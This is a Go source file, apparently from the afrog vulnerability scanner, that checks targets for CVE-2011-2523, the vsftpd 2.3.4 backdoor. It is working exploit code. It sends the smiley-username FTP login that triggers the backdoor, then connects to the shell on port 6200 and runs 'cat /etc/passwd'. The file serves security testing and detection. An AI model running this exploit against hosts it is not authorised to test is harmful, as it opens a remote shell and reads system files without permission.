-
Notifications
You must be signed in to change notification settings - Fork 370
/
CVE-2011-2523.go
70 lines (54 loc) · 1.3 KB
/
CVE-2011-2523.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
package gox
import (
"fmt"
"github.com/zan8in/afrog/v3/pkg/protocols/netxclient"
"github.com/zan8in/pins/netx"
urlutil "github.com/zan8in/pins/url"
)
func cve_2011_2523(target string, variableMap map[string]any) error {
var err error
variableMap["request"] = nil
variableMap["response"] = nil
host, err := urlutil.Host(target)
if err != nil {
return err
}
address := fmt.Sprintf("%s:21", host)
_, err = cve_2011_2523_payload1(address, "USER letmein:)\r\nPASS please\r\n")
if err != nil {
return err
}
address = fmt.Sprintf("%s:6200", host)
data, err := cve_2011_2523_payload1(address, "cat /etc/passwd")
if err != nil {
return err
}
setResponse(data, variableMap)
setRequest(address, variableMap)
setTarget(address, variableMap)
setFullTarget(address, variableMap)
return nil
}
func cve_2011_2523_payload1(address, body string) (string, error) {
nc, err := netxclient.NewNetClient(address, netxclient.Config{})
if err != nil {
return "", err
}
client, err := netx.NewClient(address, *nc.Config())
if err != nil {
return "", err
}
defer client.Close()
err = client.Send([]byte(body))
if err != nil {
return "", err
}
data, err := client.Receive()
if err != nil {
return "", err
}
return string(data), nil
}
func init() {
funcMap["cve-2011-2523"] = cve_2011_2523
}